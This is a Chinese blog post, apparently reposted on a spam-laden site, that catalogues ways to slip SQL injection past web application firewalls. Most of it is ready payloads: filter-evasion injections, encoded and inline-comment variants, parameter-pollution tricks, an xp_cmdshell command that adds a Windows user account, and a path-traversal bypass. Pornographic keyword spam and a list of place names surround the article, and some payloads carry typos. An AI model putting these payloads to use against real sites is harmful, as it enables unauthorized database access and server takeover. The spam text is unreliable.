久久精品人人爽,华人av在线,亚洲性视频网站,欧美专区一二三

SQL注入繞過的知識點有哪些

213次閱讀
沒有評論

共計 6019 個字符,預計需要花費 16 分鐘才能閱讀完成。

這篇文章主要介紹 SQL 注入繞過的知識點有哪些,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!

一、  繞過 waf 思路

從第一步起,一點一點去分析,然后繞過。

1、過濾 and,or

preg_match(/(and|or)/i , $id)
Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1   1 = 1

2、過濾 and, or, union

preg_match(/(and|or|union)/i , $id)
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) =  admin

3、過濾 and, or, union, where

preg_match(/(and|or|union|where)/i , $id)
Filtered injection: 1 || (select user from users where user_id = 1) =  admin 
Bypassed injection: 1 || (select user from users limit 1) =  admin

4、過濾 and, or, union, where, limit

preg_match(/(and|or|union|where|limit)/i , $id)
Filtered injection: 1 || (select user from users limit 1) =  admin 
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) =  admin

5、過濾 and, or, union, where, limit, group by

preg_match(/(and|or|union|where|limit|group by)/i , $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) =  admin 
Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1

6、過濾 and, or, union, where, limit, group by, select

preg_match(/(and|or|union|where|limit|group by|select)/i , $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile  result.txt 
Bypassed injection: 1 || substr(user,1,1) =  a

7、過濾 and, or, union, where, limit, group by, select,‘

preg_match(/(and|or|union|where|limit|group by|select|\)/i , $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)

8、過濾 and, or, union, where, limit, group by, select,‘, hex

preg_match(/(and|or|union|where|limit|group by|select|\ |hex)/i , $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))

9、過濾 and, or, union, where, limit, group by, select,‘, hex, substr

preg_match(/(and|or|union|where|limit|group by|select|\ |hex|substr)/i , $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)

10、過濾 and, or, union, where, limit, group by, select,‘, hex, substr, 空格

preg_match(/(and|or|union|where|limit|group by|select|\ |hex|substr|\s)/i , $id)
Filtered injection: 1 || lpad(user,7,1)
ypassed injection: 1%0b||%0blpad(user,7,1)

二、正則繞過

根據正則的的模糊匹配特性繞過,比如過濾了 =

filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1,1 or‘1 ,1 or char(97)

eg:
filtered injection: 1 union select 1, table_name from information_schema.tables where table_name =  users 
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between  a  and  z 
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

三、通用繞過

1. 注釋符

?id=1+un//ion+se//lect+1,2,3–

2. 大小寫

?id=1+UnIoN//SeLecT//1,2,3–

3. 關鍵字替換

有些 waf 等使用 preg_replace 替換了 SQL 關鍵字

?id=1+UNunionION+SEselectLECT+1,2,3--
?id=1+uni%0bon+se%0blect+1,2,3--

有時候注釋符 /**/‘可能被過濾,也可以使用 %0b 繞過

Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html

4. 編碼

一個經典的腳本:Nukesentinel.php

// Check for UNION attack
 // Copyright 2004(c) Raven PHP Scripts
 $blocker_row = $blocker_array[1];
 if($blocker_row[ activate]   0) { if (stristr($nsnst_const[ query_string], +union+ ) OR \
 stristr($nsnst_const[ query_string], %20union%20 ) OR \
 stristr($nsnst_const[ query_string], */union/* ) OR \
 stristr($nsnst_const[ query_string],  union  ) OR \
 stristr($nsnst_const[ query_string_base64], +union+ ) OR \
 stristr($nsnst_const[ query_string_base64], %20union%20 ) OR \
 stristr($nsnst_const[ query_string_base64], */union/* ) OR \
 stristr($nsnst_const[ query_string_base64],  union  )) { // block_ip($blocker_row);
 die(BLOCK IP 1   );
 }
 }
Forbidden: http://localhost/php/?/**/union/**/select
Bypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect

5. 緩沖區溢出

http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–

6. 內聯注釋 (mysql)

http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

四、高級繞過

1.HPP(http 參數污染 )

舉個例子:

index.php?par1=val1 par1=val2
| web server | par1 |
| :— | :— |
| ASP.NET/IIS | val1,val2 |
| ASP/IIS | val1,val2 |
| PHP/Apache | val2 |
| JSP/Tomcat | val1 |

eg:

在 ASP/ASP.NET 的環境下

Forbidden: http://localhost/search.aspx?q=select name,password from users
Bypassed : http://localhost/search.aspx?q=select name q=password from users
Bypassed : http://localhost/search.aspx?q=select/* q=*/name q=password/* q=*/from/* q=*/users
Bypassed : http://localhost/news.aspx?id=1  /* id=1*/ EXEC /* id=1*/ master..xp_cmdshell /* id=1*/ net user test test /* id=1*/ --

2.HPC(http 參數污染)

RFC2396 定義了如下一些字符:

Unreserved: a-z, A-Z, 0-9 and _ . ! ~ *   ()
Reserved : ; / ? : @   = + $ ,
Unwise : { } | \ ^ [ ] `

不同的 Web 服務器處理處理構造得特殊請求時有不同的邏輯:

| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP |
| :— | :— | :— |
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test%00=1 | test= | test=1 |
| ?test=1%001 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |

eg:

Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell
Forbidden: http://localhost/test.asp?file=../flag.txt
Bypassed : http://localhost/test.asp?file=.%./flag.txt
Forbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

以上是“SQL 注入繞過的知識點有哪些”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注丸趣 TV 行業資訊頻道!

正文完
 
丸趣
版權聲明:本站原創文章,由 丸趣 2023-08-04發表,共計6019字。
轉載說明:除特殊說明外本站除技術相關以外文章皆由網絡搜集發布,轉載請注明出處。
評論(沒有評論)
主站蜘蛛池模板: 辽阳县| 满城县| 灵山县| 南开区| 上蔡县| 墨竹工卡县| 宁安市| 南通市| 肇东市| 崇州市| 衡阳市| 桦甸市| 融水| 平和县| 千阳县| 舞钢市| 绥江县| 台中县| 铅山县| 永宁县| 容城县| 河西区| 滁州市| 明溪县| 巫山县| 信阳市| 重庆市| 阿坝县| 锦屏县| 湄潭县| 五寨县| 门源| 漾濞| 沧源| 永州市| 偏关县| 吴川市| 秀山| 抚松县| 蓬安县| 景东|